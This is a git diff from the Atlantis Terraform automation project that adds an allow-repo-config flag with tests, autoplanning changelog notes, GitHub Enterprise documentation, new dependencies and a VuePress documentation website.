diff --git a/.circleci/config.yml b/.circleci/config.yml
index a632082603..50fb04e89c 100644
--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -3,7 +3,7 @@ jobs:
test:
working_directory: /go/src/github.com/runatlantis/atlantis
docker:
- - image: circleci/golang:1.10
+ - image: runatlantis/testing-env
steps:
- checkout
- run: make test-coverage
diff --git a/.gitignore b/.gitignore
index 4da26ca0b0..9e06e28b0a 100644
--- a/.gitignore
+++ b/.gitignore
@@ -8,3 +8,5 @@ website/src/public
.DS_Store
.cover
.terraform/
+node_modules/
+**/.vuepress/dist
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 776ab26210..95db6b164e 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1,3 +1,23 @@
+# v0.4.0-alpha
+
+## Features
+* Autoplanning - Atlantis will automatically run `plan` on new pull requests and
+when new commits are pushed to the pull request.
+* New repository `atlantis.yaml` format that supports:
+ * Arbitrary step ordering
+ * Single config file for whole repository
+ * Controlling autoplanning
+* Moved docs to standalone website from the README.
+
+## Bugfixes
+
+## Backwards Incompatibilities / Notes:
+
+## Downloads
+
+## Docker
+
+
# v0.3.10
## Features
diff --git a/Gopkg.lock b/Gopkg.lock
index 8e3c34c6e2..7ae9566a29 100644
--- a/Gopkg.lock
+++ b/Gopkg.lock
@@ -1,6 +1,24 @@
# This file is autogenerated, do not edit; changes may be undone by the next 'dep ensure'.
+[[projects]]
+ name = "github.com/Masterminds/semver"
+ packages = ["."]
+ revision = "c7af12943936e8c39859482e61f0574c2fd7fc75"
+ version = "v1.4.2"
+
+[[projects]]
+ name = "github.com/Masterminds/sprig"
+ packages = ["."]
+ revision = "6b2a58267f6a8b1dc8e2eb5519b984008fa85e8c"
+ version = "v2.15.0"
+
+[[projects]]
+ name = "github.com/aokoli/goutils"
+ packages = ["."]
+ revision = "3391d3790d23d03408670993e957e8f408993c34"
+ version = "v1.0.1"
+
[[projects]]
name = "github.com/boltdb/bolt"
packages = ["."]
@@ -13,6 +31,18 @@
revision = "48dbb65d7bd5c74ab50d53d04c949f20e3d14944"
version = "1.0"
+[[projects]]
+ name = "github.com/davecgh/go-spew"
+ packages = ["spew"]
+ revision = "346938d642f2ec3594ed81d874461961cd0faa76"
+ version = "v1.1.0"
+
+[[projects]]
+ branch = "master"
+ name = "github.com/docker/docker"
+ packages = ["pkg/fileutils"]
+ revision = "e2593239d949eee454935daea7a5fe025477322f"
+
[[projects]]
branch = "master"
name = "github.com/elazarl/go-bindata-assetfs"
@@ -25,12 +55,30 @@
revision = "570b54cabe6b8eb0bc2dfce68d964677d63b5260"
version = "v1.5.0"
+[[projects]]
+ branch = "master"
+ name = "github.com/flynn-archive/go-shlex"
+ packages = ["."]
+ revision = "3f9db97f856818214da2e1057f8ad84803971cff"
+
[[projects]]
name = "github.com/fsnotify/fsnotify"
packages = ["."]
revision = "629574ca2a5df945712d3079857300b5e4da0236"
version = "v1.4.2"
+[[projects]]
+ name = "github.com/go-ozzo/ozzo-validation"
+ packages = ["."]
+ revision = "85dcd8368eba387e65a03488b003e233994e87e9"
+ version = "v3.3"
+
+[[projects]]
+ name = "github.com/go-test/deep"
+ packages = ["."]
+ revision = "6592d9cc0a499ad2d5f574fde80a2b5c5cc3b4f5"
+ version = "v1.0.1"
+
[[projects]]
branch = "master"
name = "github.com/google/go-github"
@@ -43,6 +91,12 @@
packages = ["query"]
revision = "53e6ce116135b80d037921a7fdd5138cf32d7a8a"
+[[projects]]
+ name = "github.com/google/uuid"
+ packages = ["."]
+ revision = "064e2069ce9c359c118179501254f67d7d37ba24"
+ version = "0.2"
+
[[projects]]
name = "github.com/gorilla/context"
packages = ["."]
@@ -89,6 +143,18 @@
]
revision = "68e816d1c783414e79bc65b3994d9ab6b0a722ab"
+[[projects]]
+ name = "github.com/huandu/xstrings"
+ packages = ["."]
+ revision = "2bf18b218c51864a87384c06996e40ff9dcff8e1"
+ version = "v1.0.0"
+
+[[projects]]
+ name = "github.com/imdario/mergo"
+ packages = ["."]
+ revision = "9316a62528ac99aaecb4e47eadd6dc8aa6533d58"
+ version = "v0.3.5"
+
[[projects]]
name = "github.com/inconshreveable/mousetrap"
packages = ["."]
@@ -182,6 +248,12 @@
revision = "645ef00459ed84a119197bfb8d8205042c6df63d"
version = "v0.8.0"
+[[projects]]
+ name = "github.com/sirupsen/logrus"
+ packages = ["."]
+ revision = "c155da19408a8799da419ed3eeb0cb5db0ad5dbc"
+ version = "v1.0.5"
+
[[projects]]
branch = "master"
name = "github.com/spf13/afero"
@@ -236,7 +308,11 @@
[[projects]]
branch = "master"
name = "golang.org/x/crypto"
- packages = ["ssh/terminal"]
+ packages = [
+ "pbkdf2",
+ "scrypt",
+ "ssh/terminal"
+ ]
revision = "7d9177d70076375b9a59c8fde23d52d9c4a7ecd5"
[[projects]]
@@ -276,6 +352,6 @@
[solve-meta]
analyzer-name = "dep"
analyzer-version = 1
- inputs-digest = "00be02ec7fa459d29d2f8b3ab70a8fdf7e6c1085f4a6fd53ab6db452e0ade9da"
+ inputs-digest = "0afba7ec3d45c8cf6aea549a9ff30c674c2106f10c8f2865aee452376dcbfbe6"
solver-name = "gps-cdcl"
solver-version = 1
diff --git a/Gopkg.toml b/Gopkg.toml
index 3e16969628..38b0857452 100644
--- a/Gopkg.toml
+++ b/Gopkg.toml
@@ -88,3 +88,15 @@
[[constraint]]
branch = "master"
name = "github.com/lkysow/go-gitlab"
+
+[[constraint]]
+ name = "github.com/go-test/deep"
+ version = "1.0.1"
+
+[[constraint]]
+ branch = "master"
+ name = "github.com/flynn-archive/go-shlex"
+
+[[constraint]]
+ branch = "master"
+ name = "github.com/docker/docker"
diff --git a/Makefile b/Makefile
index 442d4b90ee..b2d0129be6 100644
--- a/Makefile
+++ b/Makefile
@@ -28,13 +28,17 @@ build-service: ## Build the main Go service
go-generate: ## Run go generate in all packages
go generate $(PKG)
-regen-mocks: ## Delete all mocks and then run go generate to regen them
- find . -type f | grep mocks/mock | grep -v vendor | xargs rm
- @# not using $(PKG) here because that it includes directories that have now
- @# been deleted, causing go generate to fail.
- go generate $$(go list ./... | grep -v e2e | grep -v vendor | grep -v static)
+#regen-mocks: ## Delete all mocks and matchers and then run go generate to regen them. This doesn't work anymore.
+#find . -type f | grep mocks/mock_ | grep -v vendor | xargs rm
+#find . -type f | grep mocks/matchers | grep -v vendor | xargs rm
+#@# not using $(PKG) here because that it includes directories that have now
+#@# been deleted, causing go generate to fail.
+#echo "this doesn't work anymore: go generate \$\$(go list ./... | grep -v e2e | grep -v vendor | grep -v static)"
test: ## Run tests
+ @go test -short $(PKG)
+
+test-all: ## Run tests including integration
@go test $(PKG)
test-coverage:
@@ -78,9 +82,9 @@ end-to-end-tests: ## Run e2e tests
./scripts/e2e.sh
generate-website-html: ## Generate HTML for website
- cd website/src && hugo -d ../html
+ yarn website:build
upload-website-html: ## Upload generated website to s3
aws s3 rm s3://www.runatlantis.io/ --recursive
- aws s3 sync website/html/ s3://www.runatlantis.io/
- rm -rf website/html/
+ aws s3 sync runatlantis.io/.vuepress/dist/ s3://www.runatlantis.io/
+ rm -rf runatlantis.io/.vuepress/dist
diff --git a/README.md b/README.md
index 9397f7a77a..09ddd4f0c2 100644
--- a/README.md
+++ b/README.md
@@ -124,42 +124,42 @@ Atlantis supports several Terraform project structures:
```
.
├── project1
-│ ├── main.tf
+│ ├── main.tf
| └── ...
└── project2
- ├── main.tf
+ ├── main.tf
└── ...
```
- one folder per set of configuration
```
.
├── staging
-│ ├── main.tf
+│ ├── main.tf
| └── ...
└── production
- ├── main.tf
+ ├── main.tf
└── ...
```
- using `env/{env}.tfvars` to define workspace specific variables. This works in both multi-project repos and single-project repos.
```
.
├── env
-│ ├── production.tfvars
-│ └── staging.tfvars
+│ ├── production.tfvars
+│ └── staging.tfvars
└── main.tf
```
or
```
.
├── project1
-│ ├── env
-│ │ ├── production.tfvars
-│ │ └── staging.tfvars
-│ └── main.tf
+│ ├── env
+│ │ ├── production.tfvars
+│ │ └── staging.tfvars
+│ └── main.tf
└── project2
├── env
- │ ├── production.tfvars
- │ └── staging.tfvars
+ │ ├── production.tfvars
+ │ └── staging.tfvars
└── main.tf
```
With the above project structure you can de-duplicate your Terraform code between workspaces/environments without requiring extensive use of modules. At Hootsuite we found this project format to be very successful and use it in all of our 100+ Terraform repositories.
@@ -261,6 +261,8 @@ Once a plan is discarded, you'll need to run `plan` again prior to running `appl
If you'd like to require pull/merge requests to be approved prior to a user running `atlantis apply` simply run Atlantis with the `--require-approval` flag.
By default, no approval is required.
+Please note that this option is not intended for access control purposes: anyone with even read access to a repository can approve a pull request.
+
For more information on GitHub pull request reviews and approvals see: https://help.github.com/articles/about-pull-request-reviews/
For more information on GitLab merge request reviews and approvals (only supported on GitLab Enterprise) see: https://docs.gitlab.com/ee/user/project/merge_requests/merge_request_approvals.html.
@@ -382,6 +384,12 @@ $ atlantis server --atlantis-url $URL --gh-user $USERNAME --gh-token $TOKEN --gh
2049/10/6 00:00:00 [WARN] server: Atlantis started - listening on port 4141
```
+If you're using GitHub Enterprise, run:
+```
+$ atlantis server --atlantis-url $URL --gh-user $USERNAME --gh-token $TOKEN --gh-webhook-secret $SECRET --gh-hostname $GITHUBHOSTNAME
+2049/10/6 00:00:00 [WARN] server: Atlantis started - listening on port 4141
+```
+
If you're using GitLab, run:
```
$ atlantis server --atlantis-url $URL --gitlab-user $USERNAME --gitlab-token $TOKEN --gitlab-webhook-secret $SECRET
@@ -392,6 +400,7 @@ $ atlantis server --atlantis-url $URL --gitlab-user $USERNAME --gitlab-token $TO
- `$USERNAME` is the GitHub/GitLab username you generated the token for
- `$TOKEN` is the access token you created. If you don't want this to be passed in as an argument for security reasons you can specify it in a config file (see [Configuration](#configuration)) or as an environment variable: `ATLANTIS_GH_TOKEN` or `ATLANTIS_GITLAB_TOKEN`
- `$SECRET` is the random key you used for the webhook secret. If you left the secret blank then don't specify this flag. If you don't want this to be passed in as an argument for security reasons you can specify it in a config file (see [Configuration](#configuration)) or as an environment variable: `ATLANTIS_GH_WEBHOOK_SECRET` or `ATLANTIS_GITLAB_WEBHOOK_SECRET`
+- `$GITHUBHOSTNAME` is the FQDN of your enterprise Github, for example `github.mycompany.com` (adding protocol before the FQDN is unnecessary, it will always use https). If you want to set it as an environment variable then use `ATLANTIS_GH_HOSTNAME`.
Atlantis is now running!
**We recommend running it under something like Systemd or Supervisord.**
diff --git a/cmd/server.go b/cmd/server.go
index 3fc9ff1aaf..67a37fa8ac 100644
--- a/cmd/server.go
+++ b/cmd/server.go
@@ -32,8 +32,9 @@ import (
// 3. Add your flag's description etc. to the stringFlags, intFlags, or boolFlags slices.
const (
// Flag names.
- AtlantisURLFlag = "atlantis-url"
AllowForkPRsFlag = "allow-fork-prs"
+ AllowRepoConfigFlag = "allow-repo-config"
+ AtlantisURLFlag = "atlantis-url"
ConfigFlag = "config"
DataDirFlag = "data-dir"
GHHostnameFlag = "gh-hostname"
@@ -142,6 +143,13 @@ var boolFlags = []boolFlag{
description: "Allow Atlantis to run on pull requests from forks. A security issue for public repos.",
defaultValue: false,
},
+ {
+ name: AllowRepoConfigFlag,
+ description: "Allow repositories to use atlantis.yaml files to customize the commands Atlantis runs." +
+ " Should only be enabled in a trusted environment since it enables a pull request to run arbitrary commands" +
+ " on the Atlantis server.",
+ defaultValue: false,
+ },
{
name: RequireApprovalFlag,
description: "Require pull requests to be \"Approved\" before allowing the apply command to be run.",
@@ -298,8 +306,9 @@ func (s *ServerCmd) run() error {
// Config looks good. Start the server.
server, err := s.ServerCreator.NewServer(userConfig, server.Config{
- AllowForkPRsFlag: AllowForkPRsFlag,
- AtlantisVersion: s.AtlantisVersion,
+ AllowForkPRsFlag: AllowForkPRsFlag,
+ AllowRepoConfigFlag: AllowRepoConfigFlag,
+ AtlantisVersion: s.AtlantisVersion,
})
if err != nil {
return errors.Wrap(err, "initializing server")
diff --git a/cmd/server_test.go b/cmd/server_test.go
index 4a41f72060..589dc6802b 100644
--- a/cmd/server_test.go
+++ b/cmd/server_test.go
@@ -278,6 +278,7 @@ func TestExecute_Defaults(t *testing.T) {
Ok(t, err)
Equals(t, "http://"+hostname+":4141", passedConfig.AtlantisURL)
Equals(t, false, passedConfig.AllowForkPRs)
+ Equals(t, false, passedConfig.AllowRepoConfig)
// Get our home dir since that's what gets defaulted to
dataDir, err := homedir.Expand("~/.atlantis")
@@ -361,6 +362,7 @@ func TestExecute_Flags(t *testing.T) {
c := setup(map[string]interface{}{
cmd.AtlantisURLFlag: "url",
cmd.AllowForkPRsFlag: true,
+ cmd.AllowRepoConfigFlag: true,
cmd.DataDirFlag: "/path",
cmd.GHHostnameFlag: "ghhostname",
cmd.GHTokenFlag: "token",
@@ -382,6 +384,7 @@ func TestExecute_Flags(t *testing.T) {
Equals(t, "url", passedConfig.AtlantisURL)
Equals(t, true, passedConfig.AllowForkPRs)
+ Equals(t, true, passedConfig.AllowRepoConfig)
Equals(t, "/path", passedConfig.DataDir)
Equals(t, "ghhostname", passedConfig.GithubHostname)
Equals(t, "token", passedConfig.GithubToken)
@@ -404,6 +407,7 @@ func TestExecute_ConfigFile(t *testing.T) {
tmpFile := tempFile(t, `---
atlantis-url: "url"
allow-fork-prs: true
+allow-repo-config: true
data-dir: "/path"
gh-hostname: "ghhostname"
gh-token: "token"
@@ -429,6 +433,7 @@ ssl-key-file: key-file
Ok(t, err)
Equals(t, "url", passedConfig.AtlantisURL)
Equals(t, true, passedConfig.AllowForkPRs)
+ Equals(t, true, passedConfig.AllowRepoConfig)
Equals(t, "/path", passedConfig.DataDir)
Equals(t, "ghhostname", passedConfig.GithubHostname)
Equals(t, "token", passedConfig.GithubToken)
@@ -451,6 +456,7 @@ func TestExecute_EnvironmentOverride(t *testing.T) {
tmpFile := tempFile(t, `---
atlantis-url: "url"
allow-fork-prs: true
+allow-repo-config: true
data-dir: "/path"
gh-hostname: "ghhostname"
gh-token: "token"
@@ -473,6 +479,7 @@ ssl-key-file: key-file
for name, value := range map[string]string{
"ATLANTIS_URL": "override-url",
"ALLOW_FORK_PRS": "false",
+ "ALLOW_REPO_CONFIG": "false",
"DATA_DIR": "/override-path",
"GH_HOSTNAME": "override-gh-hostname",
"GH_TOKEN": "override-gh-token",
@@ -498,6 +505,7 @@ ssl-key-file: key-file
Ok(t, err)
Equals(t, "override-url", passedConfig.AtlantisURL)
Equals(t, false, passedConfig.AllowForkPRs)
+ Equals(t, false, passedConfig.AllowRepoConfig)
Equals(t, "/override-path", passedConfig.DataDir)
Equals(t, "override-gh-hostname", passedConfig.GithubHostname)
Equals(t, "override-gh-token", passedConfig.GithubToken)
@@ -520,6 +528,7 @@ func TestExecute_FlagConfigOverride(t *testing.T) {
tmpFile := tempFile(t, `---
atlantis-url: "url"
allow-fork-prs: true
+allow-repo-config: true
data-dir: "/path"
gh-hostname: "ghhostname"
gh-token: "token"
@@ -541,6 +550,7 @@ ssl-key-file: key-file
c := setup(map[string]interface{}{
cmd.AtlantisURLFlag: "override-url",
cmd.AllowForkPRsFlag: false,
+ cmd.AllowRepoConfigFlag: false,
cmd.DataDirFlag: "/override-path",
cmd.GHHostnameFlag: "override-gh-hostname",
cmd.GHTokenFlag: "override-gh-token",
@@ -584,6 +594,7 @@ func TestExecute_FlagEnvVarOverride(t *testing.T) {
for name, value := range map[string]string{
"ATLANTIS_URL": "url",
"ALLOW_FORK_PRS": "true",
+ "ALLOW_REPO_CONFIG": "true",
"DATA_DIR": "/path",
"GH_HOSTNAME": "gh-hostname",
"GH_TOKEN": "gh-token",
@@ -606,6 +617,7 @@ func TestExecute_FlagEnvVarOverride(t *testing.T) {
c := setup(map[string]interface{}{
cmd.AtlantisURLFlag: "override-url",
cmd.AllowForkPRsFlag: false,
+ cmd.AllowRepoConfigFlag: false,
cmd.DataDirFlag: "/override-path",
cmd.GHHostnameFlag: "override-gh-hostname",
cmd.GHTokenFlag: "override-gh-token",
@@ -627,6 +639,7 @@ func TestExecute_FlagEnvVarOverride(t *testing.T) {
Equals(t, "override-url", passedConfig.AtlantisURL)
Equals(t, false, passedConfig.AllowForkPRs)
+ Equals(t, false, passedConfig.AllowRepoConfig)
Equals(t, "/override-path", passedConfig.DataDir)
Equals(t, "override-gh-hostname", passedConfig.GithubHostname)
Equals(t, "override-gh-token", passedConfig.GithubToken)
diff --git a/docs/atlantis-plan.gif b/docs/atlantis-plan.gif
deleted file mode 100644
index ec106133d9..0000000000
Binary files a/docs/atlantis-plan.gif and /dev/null differ
diff --git a/e2e/.gitconfig b/e2e/.gitconfig
index 43da800f32..3424a0e076 100644
--- a/e2e/.gitconfig
+++ b/e2e/.gitconfig
@@ -1,3 +1,3 @@
[user]
- name = Luke Kysow
+ name = atlantisbot
email = lkysow+atlantis@gmail.com
\ No newline at end of file
diff --git a/e2e/e2e.go b/e2e/e2e.go
index 041f240d7b..bf51830782 100644
--- a/e2e/e2e.go
+++ b/e2e/e2e.go
@@ -128,14 +128,7 @@ func (t *E2ETester) Start() (*E2EResult, error) {
// defer closing pull request and delete remote branch
defer cleanUp(t, pull.GetNumber(), branchName) // nolint: errcheck
- // create run plan comment
- log.Printf("creating plan comment: %q", t.projectType.PlanCommand)
- _, _, err = t.githubClient.client.Issues.CreateComment(t.githubClient.ctx, t.ownerName, t.repoName, pull.GetNumber(), &github.IssueComment{Body: github.String(t.projectType.PlanCommand)})
- if err != nil {
- return e2eResult, fmt.Errorf("error creating 'run plan' comment on github")
- }
-
- // wait for atlantis to respond to webhook
+ // wait for atlantis to respond to webhook and autoplan.
time.Sleep(2 * time.Second)
state := "not started"
diff --git a/e2e/main.go b/e2e/main.go
index 0f1e9f274a..8513032415 100644
--- a/e2e/main.go
+++ b/e2e/main.go
@@ -27,13 +27,12 @@ import (
var defaultAtlantisURL = "http://localhost:4141"
var projectTypes = []Project{
- {"standalone", "atlantis plan", "atlantis apply"},
- {"standalone-with-workspace", "atlantis plan -w staging", "atlantis apply -w staging"},
+ {"standalone", "atlantis apply -d standalone"},
+ {"standalone-with-workspace", "atlantis apply -d standalone-with-workspace -w staging"},
}
type Project struct {
Name string
- PlanCommand string
ApplyCommand string
}
diff --git a/package.json b/package.json
new file mode 100644
index 0000000000..a74a965486
--- /dev/null
+++ b/package.json
@@ -0,0 +1,9 @@
+{
+ "devDependencies": {
+ "vuepress": "^0.10.2"
+ },
+ "scripts": {
+ "website:dev": "vuepress dev runatlantis.io",
+ "website:build": "vuepress build runatlantis.io"
+ }
+}
diff --git a/runatlantis.io/.vuepress/components/HomeCustom.vue b/runatlantis.io/.vuepress/components/HomeCustom.vue
new file mode 100644
index 0000000000..fb7bf325ab
--- /dev/null
+++ b/runatlantis.io/.vuepress/components/HomeCustom.vue
@@ -0,0 +1,154 @@
+
+
+
+
+
{{ data.heroText || $title || 'Hello' }}
+
+ {{ data.tagline || $description || 'Welcome to your VuePress site' }}
+
+
+ Get Started →
+
+
+
+
+
What is it?
+
A standalone application that listens for Terraform pull request events via webhooks. You deploy it yourself.
+
+
+
What does it do?
+
Runs terraform plan
and apply
remotely and comments back on the pull request with the output.
+
+
+
Why should you use it?
+
- Make Terraform changes visible to your whole team.
- Enable non-operations engineers to collaborate on Terraform.
- Standardize your Terraform workflows.
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/runatlantis.io/.vuepress/config.js b/runatlantis.io/.vuepress/config.js
new file mode 100644
index 0000000000..552f878aaa
--- /dev/null
+++ b/runatlantis.io/.vuepress/config.js
@@ -0,0 +1,59 @@
+module.exports = {
+ title: 'Atlantis',
+ description: 'Terraform Automation By Pull Request',
+ head: [
+ ['link', { rel: 'icon', type: 'image/png', href: 'favicon-196x196.png', sizes: '196x196' }],
+ ['link', { rel: 'icon', type: 'image/png', href: 'favicon-96x96.png', sizes: '96x96' }],
+ ['link', { rel: 'icon', type: 'image/png', href: 'favicon-32x32.png', sizes: '32x32' }],
+ ['link', { rel: 'icon', type: 'image/png', href: 'favicon-16x16.png', sizes: '16x16' }],
+ ['link', { rel: 'icon', type: 'image/png', href: 'favicon-128.png', sizes: '128x128' }],
+ ['link', { rel: 'apple-touch-icon-precomposed', sizes: '57x57', href: 'apple-touch-icon-57x57.png' }],
+ ['link', { rel: 'apple-touch-icon-precomposed', sizes: '114x114', href: 'apple-touch-icon-114x114.png' }],
+ ['link', { rel: 'apple-touch-icon-precomposed', sizes: '72x72', href: 'apple-touch-icon-72x72.png' }],
+ ['link', { rel: 'apple-touch-icon-precomposed', sizes: '144x144', href: 'apple-touch-icon-144x144.png' }],
+ ['link', { rel: 'apple-touch-icon-precomposed', sizes: '60x60', href: 'apple-touch-icon-60x60.png' }],
+ ['link', { rel: 'apple-touch-icon-precomposed', sizes: '120x120', href: 'apple-touch-icon-120x120.png' }],
+ ['link', { rel: 'apple-touch-icon-precomposed', sizes: '76x76', href: 'apple-touch-icon-76x76.png' }],
+ ['link', { rel: 'apple-touch-icon-precomposed', sizes: '152x152', href: 'apple-touch-icon-152x152.png' }],
+ ['meta', {name: 'msapplication-TileColor', content: '#FFFFFF' }],
+ ['meta', {name: 'msapplication-TileImage', content: 'mstile-144x144.png' }],
+ ['meta', {name: 'msapplication-square70x70logo', content: 'mstile-70x70.png' }],
+ ['meta', {name: 'msapplication-square150x150logo', content: 'mstile-150x150.png' }],
+ ['meta', {name: 'msapplication-wide310x150logo', content: 'mstile-310x150.png' }],
+ ['meta', {name: 'msapplication-square310x310logo', content: 'mstile-310x310.png' }],
+ ['link', { rel: 'stylesheet', sizes: '152x152', href: 'https://fonts.googleapis.com/css?family=Lato:400,900' }]
+ ],
+ themeConfig: {
+ nav: [
+ {text: 'Home', link: '/'},
+ {text: 'Guide', link: '/guide/'},
+ {text: 'Docs', link: '/docs/'},
+ {text: 'Blog', link: 'https://medium.com/runatlantis'}
+ ],
+ sidebar: {
+ '/docs/': [
+ '',
+ 'pull-request-commands',
+ 'deployment',
+ 'server-configuration',
+ 'apply-requirements',
+ 'locking',
+ 'autoplanning',
+ ['atlantis-yaml-reference', 'atlantis.yaml Reference'],
+ 'upgrading-atlantis-yaml-to-version-2',
+ 'security',
+ 'faq',
+ ],
+ '/guide/': [
+ '',
+ 'test-drive',
+ 'getting-started',
+ 'requirements',
+ 'atlantis-yaml-use-cases'
+ ]
+ },
+ repo: 'runatlantis/atlantis',
+ docsDir: 'runatlantis.io',
+ editLinks: true,
+ }
+}
\ No newline at end of file
diff --git a/runatlantis.io/.vuepress/override.styl b/runatlantis.io/.vuepress/override.styl
new file mode 100644
index 0000000000..deb097c9dc
--- /dev/null
+++ b/runatlantis.io/.vuepress/override.styl
@@ -0,0 +1,40 @@
+$accentColor = #0074db
+$textColor = #2c3e50
+$borderColor = #eaecef
+$codeBgColor = #282c34
+
+.theme-container.home-custom {
+ .hero {
+ h1 {
+ font-size: 64px
+ font-family: Lato, sans-serif
+ font-weight: 900
+ color: #222
+ }
+ img {
+ height: 200px
+ }
+ }
+ p.description {
+ position: relative
+ }
+ p.description:before {
+ position: absolute;
+ content: '';
+ width: 40px;
+ height: 3px;
+ top: -19px;
+ left: 50%;
+ margin-left: -20px;
+ background: #ff3366;
+ }
+ .feature {
+ h2 {
+ color: #222
+ }
+ p {
+ color: #222
+ }
+ }
+}
+
diff --git a/runatlantis.io/.vuepress/public/apple-touch-icon-114x114.png b/runatlantis.io/.vuepress/public/apple-touch-icon-114x114.png
new file mode 100644
index 0000000000..e5d8f68776
Binary files /dev/null and b/runatlantis.io/.vuepress/public/apple-touch-icon-114x114.png differ
diff --git a/runatlantis.io/.vuepress/public/apple-touch-icon-120x120.png b/runatlantis.io/.vuepress/public/apple-touch-icon-120x120.png
new file mode 100644
index 0000000000..275239f5e1
Binary files /dev/null and b/runatlantis.io/.vuepress/public/apple-touch-icon-120x120.png differ
diff --git a/runatlantis.io/.vuepress/public/apple-touch-icon-144x144.png b/runatlantis.io/.vuepress/public/apple-touch-icon-144x144.png
new file mode 100644
index 0000000000..165e94d602
Binary files /dev/null and b/runatlantis.io/.vuepress/public/apple-touch-icon-144x144.png differ
diff --git a/runatlantis.io/.vuepress/public/apple-touch-icon-152x152.png b/runatlantis.io/.vuepress/public/apple-touch-icon-152x152.png
new file mode 100644
index 0000000000..fdcae677fc
Binary files /dev/null and b/runatlantis.io/.vuepress/public/apple-touch-icon-152x152.png differ
diff --git a/runatlantis.io/.vuepress/public/apple-touch-icon-57x57.png b/runatlantis.io/.vuepress/public/apple-touch-icon-57x57.png
new file mode 100644
index 0000000000..7bf1a37dc5
Binary files /dev/null and b/runatlantis.io/.vuepress/public/apple-touch-icon-57x57.png differ
diff --git a/runatlantis.io/.vuepress/public/apple-touch-icon-60x60.png b/runatlantis.io/.vuepress/public/apple-touch-icon-60x60.png
new file mode 100644
index 0000000000..f60956692e
Binary files /dev/null and b/runatlantis.io/.vuepress/public/apple-touch-icon-60x60.png differ
diff --git a/runatlantis.io/.vuepress/public/apple-touch-icon-72x72.png b/runatlantis.io/.vuepress/public/apple-touch-icon-72x72.png
new file mode 100644
index 0000000000..5bad7f3a86
Binary files /dev/null and b/runatlantis.io/.vuepress/public/apple-touch-icon-72x72.png differ
diff --git a/runatlantis.io/.vuepress/public/apple-touch-icon-76x76.png b/runatlantis.io/.vuepress/public/apple-touch-icon-76x76.png
new file mode 100644
index 0000000000..0d98ab1ac5
Binary files /dev/null and b/runatlantis.io/.vuepress/public/apple-touch-icon-76x76.png differ
diff --git a/runatlantis.io/.vuepress/public/favicon-128.png b/runatlantis.io/.vuepress/public/favicon-128.png
new file mode 100644
index 0000000000..d9b35bcac4
Binary files /dev/null and b/runatlantis.io/.vuepress/public/favicon-128.png differ
diff --git a/runatlantis.io/.vuepress/public/favicon-16x16.png b/runatlantis.io/.vuepress/public/favicon-16x16.png
new file mode 100644
index 0000000000..d11d61369d
Binary files /dev/null and b/runatlantis.io/.vuepress/public/favicon-16x16.png differ
diff --git a/runatlantis.io/.vuepress/public/favicon-196x196.png b/runatlantis.io/.vuepress/public/favicon-196x196.png
new file mode 100644
index 0000000000..f0be80b94f
Binary files /dev/null and b/runatlantis.io/.vuepress/public/favicon-196x196.png differ
diff --git a/runatlantis.io/.vuepress/public/favicon-32x32.png b/runatlantis.io/.vuepress/public/favicon-32x32.png
new file mode 100644
index 0000000000..ffe16ae121
Binary files /dev/null and b/runatlantis.io/.vuepress/public/favicon-32x32.png differ
diff --git a/runatlantis.io/.vuepress/public/favicon-96x96.png b/runatlantis.io/.vuepress/public/favicon-96x96.png
new file mode 100644
index 0000000000..2b5b78ab2b
Binary files /dev/null and b/runatlantis.io/.vuepress/public/favicon-96x96.png differ
diff --git a/runatlantis.io/.vuepress/public/favicon.ico b/runatlantis.io/.vuepress/public/favicon.ico
new file mode 100644
index 0000000000..23dc683f76
Binary files /dev/null and b/runatlantis.io/.vuepress/public/favicon.ico differ
diff --git a/docs/atlantis-logo.png b/runatlantis.io/.vuepress/public/hero.png
similarity index 100%
rename from docs/atlantis-logo.png
rename to runatlantis.io/.vuepress/public/hero.png
diff --git a/runatlantis.io/.vuepress/public/mstile-144x144.png b/runatlantis.io/.vuepress/public/mstile-144x144.png
new file mode 100644
index 0000000000..165e94d602
Binary files /dev/null and b/runatlantis.io/.vuepress/public/mstile-144x144.png differ
diff --git a/runatlantis.io/.vuepress/public/mstile-150x150.png b/runatlantis.io/.vuepress/public/mstile-150x150.png
new file mode 100644
index 0000000000..138e1ae885
Binary files /dev/null and b/runatlantis.io/.vuepress/public/mstile-150x150.png differ
diff --git a/runatlantis.io/.vuepress/public/mstile-310x150.png b/runatlantis.io/.vuepress/public/mstile-310x150.png
new file mode 100644
index 0000000000..b276fac049
Binary files /dev/null and b/runatlantis.io/.vuepress/public/mstile-310x150.png differ
diff --git a/runatlantis.io/.vuepress/public/mstile-310x310.png b/runatlantis.io/.vuepress/public/mstile-310x310.png
new file mode 100644
index 0000000000..05687f3ec3
Binary files /dev/null and b/runatlantis.io/.vuepress/public/mstile-310x310.png differ
diff --git a/runatlantis.io/.vuepress/public/mstile-70x70.png b/runatlantis.io/.vuepress/public/mstile-70x70.png
new file mode 100644
index 0000000000..d9b35bcac4
Binary files /dev/null and b/runatlantis.io/.vuepress/public/mstile-70x70.png differ
diff --git a/runatlantis.io/README.md b/runatlantis.io/README.md
new file mode 100644
index 0000000000..3fdb030333
--- /dev/null
+++ b/runatlantis.io/README.md
@@ -0,0 +1,19 @@
+---
+layout: HomeCustom
+pageClass: home-custom
+heroImage: /hero.png
+heroText: Atlantis
+actionText: Get Started →
+actionLink: /guide/
+---
+
+## How it works
+* You deploy Atlantis internally. You don't have to give your cloud credentials to a third party.
+ * It runs as a golang binary or Docker container.
+* Expose it with a URL that is accessible by github/gitlab.com or your private git host.
+* Add its URL to your GitHub or GitLab repository so it can receive webhooks.
+* When a Terraform pull request is opened, Atlantis will run `terraform plan` and comment
+with the output back to the pull request.
+ * The exact `terraform plan` command is configurable.
+* If the `plan` looks good, users can comment on the pull request `atlantis apply` to apply the plan.
+ * You can require pull request approval before running `apply` is allowed.
diff --git a/runatlantis.io/docs/README.md b/runatlantis.io/docs/README.md
new file mode 100644
index 0000000000..90952633b6
--- /dev/null
+++ b/runatlantis.io/docs/README.md
@@ -0,0 +1,18 @@
+# Overview
+
+This documentation is divided into sections:
+* [Pull Request Commands](pull-request-commands.html) - the commands that Atlantis supports via pull request comments.
+* [Production-Ready Deployment](deployment.html) - how to deploy Atlantis.
+* [Server Configuration](server-configuration.html) - how to configure the Atlantis server.
+* [Apply Requirements](apply-requirements.html) - what requirements can be set before `atlantis apply` is allowed.
+* [Locking](locking.html) - how and why Atlantis does locking.
